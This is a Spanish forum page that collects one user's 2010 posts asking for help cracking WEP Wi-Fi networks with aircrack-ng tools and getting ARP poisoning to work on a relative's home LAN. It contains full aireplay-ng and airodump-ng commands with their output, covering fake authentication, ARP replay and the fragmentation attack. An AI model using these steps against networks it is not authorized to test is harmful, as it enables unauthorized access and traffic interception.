Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Debci

#1011
Hacking / Re: Intento de Spoofeo...
30 Junio 2010, 18:01 PM
Cita de: pianista en 30 Junio 2010, 17:43 PM
Realmente como esté conectado es lo de menos, simpre y cuando compartais router...
Yo opino que o bien como ya te han dicho, el PC detecta el arp poison algún antivirus, o bueno firewall más bien lo detectan...

O bien el propio router detecta los arp poison y por eso no te deja hacerlos, eso lo puedes decubrir mirando con wireshark el tráfico y viendo si las secuencias son normales.

Saludos
Y para eso, alguna solución?

Saludos
#1012
Hacking / Re: Intento de Spoofeo...
30 Junio 2010, 17:35 PM
Cita de: tragantras en 30 Junio 2010, 17:28 PM
con que el PC tenga la entrada en la tabla estática ya no pueds hacer el ARP poisoning,

puede tambien que si tiene algun tipo de antivirus tenga protección contra este tipo de ataques...

puede que los paquetes del router lleguen y los tuyos no, como han dicho la distancia al AP es determinante (no es una respuesta "trivial" como dices tu...)

No me conozco la historia anterior, pero es posible que se haya conectado por cable y haya dejado de usar el inalambrico?
No, sigue habiendo wifi, probaré a acercarme, pero creo que con el 30% de señal no deberia haber problemas, no?

Saludos
#1013
Cita de: pianista en 30 Junio 2010, 17:00 PM
Si te lees la guia y la buscas, con packetforge generarás un .cap que sirve para reinyectar (vamos como si estuvieras inyectando arps)...
Para uso del packetforge:
man packetforge-ng

Para como hacer un afrag, busca porque está publicado...

Saludos
Ya, ya está.

Saludos y gracias
#1014
Hacking / Re: Intento de Spoofeo...
30 Junio 2010, 17:14 PM
Cita de: pianista en 30 Junio 2010, 16:41 PM
Creo que se refiere a que haya puesto una tabla de arp fija?

O a que tenga algún PC haciendo de firewall en la red, aunque dado que es doméstica es poco probable...

Preguntale a tu tio la topología y así se puede dar antes con el error...

Saludos
Ya he hablado con el, la cosa es que no tiene firewall, me ha dicho que es un pc simple con su router por medio.

Saludos
#1015
Cita de: pianista en 30 Junio 2010, 16:35 PM
Sigue la guia donde viene explicado como funciona el ataque de fragmentación...

Lo puedes hacer con el comando packetforge-ng, aunque también se podían crear con algun que otro programa...

Saludos
Pero que parametros les indico al packetforge? ademas que conseguiria con eso?

Conseguido, lo que hago es re-inyectar el fragmento que he recojido.
Es eso no? Consigo IV´s a montones.
Solo que no se porque a veces con otro AP no necesito hacer eso, me suben solas, pero si hago eso consigo siempre subir las IV´s?

Saludos
#1016
Hacking / Re: Intento de Spoofeo...
30 Junio 2010, 16:22 PM
Cita de: kamsky en 30 Junio 2010, 15:58 PM
digilander.libero.it/SNHYPER/files/arppoison.pdf

explícanos que conclusiones sacas ;)
Que me dice lo que ya habia leido, solo que no encuentro solucion a mi problema, pues funciona en todas las lans que he probado menos en esa...

Saludos
#1017
Cita de: ChimoC en 30 Junio 2010, 15:31 PM
Buenas:

Lee y entiende esto https://foro.elhacker.net/wireless_en_linux/guia_completa_aircrackng-t231434.0.html  y esto https://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html

En cuanto al de fragmentación --> Saving keystream in fragment-0630-132435.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream Con eso ya tienes MUCHO  ;)   

En cuanto a que no veas su utilidad... es como todo... te falta aprenderte cómo funcionan y para qué sirve cada ataque (y cómo se hace)

Un saludo

ChimoC

P.D.: Por favor, cambia el título...sino mañana te cerraré el post
Y como lo hago?
Porque ejecuto dicho comando y ahi me quedo :S
Saludos
#1018
Hacking / Re: Intento de Spoofeo...
30 Junio 2010, 14:27 PM
Cita de: kamsky en 30 Junio 2010, 13:20 PM
pues si pierdes la conexión frecuentemente quizás sea ese el problema, para envenenar la tabla arp se envía cada cierto intervalo de tiempo paquetes, si estos se pierden a causa de la desconexión...
La cosa es que mientras etsoy conectado estable no funciona, no hay que tener ningun tipo de caracteristica especial para envenenar arp en la red donde te situas?

Osea, que siempre funciona digo.

Saludos
#1019
A que te refieres con ordenes a medias?

Lo segundo, si hubiese un cliente asociado que le hago para inyectar trafico? Osea, se mas o menos lo que hay que hacer si no hay, me hago una falsa auth y inyecto conmigo mismo, pero aun asi muchas veces o casi nunca no funciona :S
Que hago si hay clientes asociados en ese AP?

Por cierto he probado el ataque de fragmentación que chimoc me ha recomendado, y ocurre lo siguiente:

aireplay-ng -5 -b 00:22:____________ -h 00:08:____________ mon0



For information, no action required: Using gettimeofday() instead of /dev/rtc
13:23:06  Waiting for beacon frame (BSSID: 00:22:_____________) on channel 1
13:23:06  Waiting for a data packet...
Read 46 packets...

        Size: 280, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:22:_____________
          Dest. MAC  =  FF:FF:__________
         Source MAC  =  00:22:___________

        0x0000:  0842 0000 ffff ffff ffff 0022 2d__________  .B........."-.].
        0x0010:  0022 2d02 5dfc b050 2e76 0f00 aaaa 0300  ."-.]..P.v......
        0x0020:  0000 0800 4500 00f0 fe68 0000 4011 f543  ....E....h..@..C
        0x0030:  c0a8 0201 c0a8 02ff 008a 008a 00dc cbe7  ................
        0x0040:  1102 0f1f c0a8 0201 008a 00c6 0000 2046  .............. F
        0x0050:  4146 4345 4a45 4f46 4545 4646 4346 4443  AFCEJEOFEEFFCFDC
        0x0060:  4143 4143 4143 4143 4143 4143 4141 4100  ACACACACACACAAA.
        0x0070:  2046 4146 4343 4e45 4846 4345 5046 4646   FAFCCNEHFCEPFFF
        0x0080:  4143 4143 4143 4143 4143 4143 4143 4142  ACACACACACACACAB
        0x0090:  4e00 ff53 4d42 2500 0000 0000 0000 0000  N..SMB%.........
        0x00a0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
        0x00b0:  0000 1100 002c 0000 0000 0000 0000 0000  .....,..........
        0x00c0:  0000 0000 0000 0000 002c 0056 0003 0001  .........,.V....
        0x00d0:  0001 0002 003d 005c 4d41 494c 534c 4f54  .....=.\MAILSLOT
        --- CUT ---

Use this packet ? yes

Saving chosen packet in replay_src-0630-132311.cap
13:24:35  Data packet found!
13:24:35  Sending fragmented packet
13:24:35  Got RELAYED packet!!
13:24:35  Trying to get 384 bytes of a keystream
13:24:35  Got RELAYED packet!!
13:24:35  Trying to get 1500 bytes of a keystream
13:24:35  Got RELAYED packet!!
Saving keystream in fragment-0630-132435.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


Y nada mas, y no veo su utilidad.

Gracias por vuestra ayuda.
#1020
 >:(

Que mosqueo llevo encima, algunos AP soy capaz de crackearlos, a veces se puede  avaces no, con el mismo AP, otras ni siquiera capturo datas....
Que decir...
Tras pelearme con mi tester y conseguir hacerlo tras un rato de pruebas, me dispongo a intentarlo con otro AP:

airodump-ng -w wep -c 1 --bssid 00:22:______ mon0

CH  1 ][ Elapsed: 21 mins ][ 2010-06-30 13:24 ][ fixed channel mon0: 11

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:22:_________  -58 100    12748     1824    0   1  54e. WEP  WEP    OPN  WLAN25D518

BSSID              STATION            PWR   Rate    Lost  Packets  Probes


Caputar datas de vez en cuando, pero no es viable tardaria mucho tiempo asi :S

aireplay-ng -1 0 -a 00:22_______ mon0
No source MAC (-h) specified. Using the device MAC (00:08:________________)
12:51:02  Waiting for beacon frame (BSSID: 00:22:____________) on channel 11

12:51:02  Sending Authentication Request (Open System) [ACK]
12:51:02  Authentication successful
12:51:02  Sending Association Request [ACK]
12:51:02  Association successful :-) (AID: 1)


Y supuestamente ya estoy asociado, ahora a inyectar trafico no?

aireplay-ng -3 -b 00:22:____________ mon0

No source MAC (-h) specified. Using the device MAC (00:08______________)
13:06:37  Waiting for beacon frame (BSSID: 00:22:________________) on channel 1
Saving ARP requests in replay_arp-0630-130637.cap
You should also start airodump-ng to capture replies.
14303 packets (got 0 ARP requests and 134 ACKs), sent 0 packets...(0 pps)


Y por mas que espero no suben los datas, en algunos AP suben, pero esperando, a veces al instante, otras tengo que hacer cosas con el ataque fragmentation, o me da la sensacion de que se arregla con eso, pero no actua igual en todos los ap.

Alguna idea?
Si me podeis decir que pauta a seguri, porque no se si lo estoy haciendo bien, y mirad que he leido y leido que no veas, y nada, tan facil que dicen todos que es...

Saludos